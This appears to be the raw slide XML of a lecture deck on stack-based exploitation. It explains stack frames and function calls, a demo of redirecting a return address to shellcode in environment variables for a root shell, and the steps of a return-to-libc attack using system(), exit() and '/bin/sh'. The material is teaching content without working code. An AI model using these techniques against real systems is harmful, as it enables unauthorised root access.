        <p:spPr>
          <a:xfrm>
            <a:off x="5461875" y="3482575"/>
            <a:ext cx="1024750" cy="1119350"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="44774" w="40990">
                <a:moveTo>
                  <a:pt x="40990" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9459" y="11036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11667" y="17973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="20810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12297" y="24909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9459" y="38468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39729" y="44774"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="566" name="Shape 566"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2883342" y="3758475"/>
            <a:ext cx="2570700" cy="536100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>these get pushed prior to jumping to the function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="567" name="Shape 567"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6202850" y="2930775"/>
            <a:ext cx="331075" cy="520275"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="20811" w="13243">
                <a:moveTo>
                  <a:pt x="10405" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1892" y="3469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5676" y="9144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5676" y="13874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2838" y="17027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13243" y="20811"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="568" name="Shape 568"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2866628" y="2564791"/>
            <a:ext cx="3336300" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>This gets saved in the first lines of a function, which is the function "prologue".</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Shape 573"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2266576"/>
            <a:ext cx="6400800" cy="1333800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>DEMO #1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="574" name="Shape 574"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3600451"/>
            <a:ext cx="6400800" cy="900600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We're going to exploit the stack frame to change the return address to jump to shellcode that we've hidden in the environment variables, to get a root shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Goto slides @ the end to see walkthroughs</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Shape 579"/>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Return to lib c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="580" name="Shape 580"/>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b="1" i="1" lang="en" sz="2400"/>
              <a:t>Usually the stack is </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="2400" u="sng"/>
              <a:t>not executable (NX)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="2400"/>
              <a:t>, as we will see next time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Can't use shellcode on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>no code injection!  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>D:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>can still control </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>EIP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>(by overriding a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>RET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>value on</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> the stack)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>can point it elsewhere and still spawn a shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>can point to dynamic-link library code!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>must be a common dynamic library</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>must allow attacker to be flexible, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>and spawn shell or w/e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Basic planning process:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Determine address of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>determine address of "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>/bin/sh" in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>determine address of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="581" name="Shape 581"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6879000" y="2783488"/>
            <a:ext cx="1807800" cy="2682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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>vuln buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>stack data .....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>EBP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ret addr</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>argument1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>argument2 ....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="582" name="Shape 582"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6881325" y="3312375"/>
            <a:ext cx="1819500" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="583" name="Shape 583"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6881325" y="3693375"/>
            <a:ext cx="1819500" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="584" name="Shape 584"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6881325" y="4074375"/>
            <a:ext cx="1819500" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="585" name="Shape 585"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6881325" y="4531575"/>
            <a:ext cx="1819500" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="586" name="Shape 586"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6881325" y="4988775"/>
            <a:ext cx="1819500" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="587" name="Shape 587"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7336200" y="2484275"/>
            <a:ext cx="1376100" cy="256500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>THE STACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="588" name="Shape 588"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6904650" y="5586700"/>
            <a:ext cx="1574700" cy="326700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>HIGH MEMORY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="589" name="Shape 589"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6904650" y="2233900"/>
            <a:ext cx="1574700" cy="326700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>LOW MEMORY</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Shape 594"/>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Return to lib c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="595" name="Shape 595"/>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lang="en" sz="2400"/>
              <a:t>Basic execution of exploit:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>fill up the vulnerable buffer up to the return address with garbage data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>overwrite the return address with the address of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>follow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>() with the address of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>append the address of  "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>/bin/sh"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Its simple and sweet</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9" name="Shape 599"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="600" name="Shape 600"/>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When function calls happen</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="601" name="Shape 601"/>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lang="en"/>
              <a:t>In general,    CALL function_name   does the following:</a:t>
            </a:r>
          </a:p>
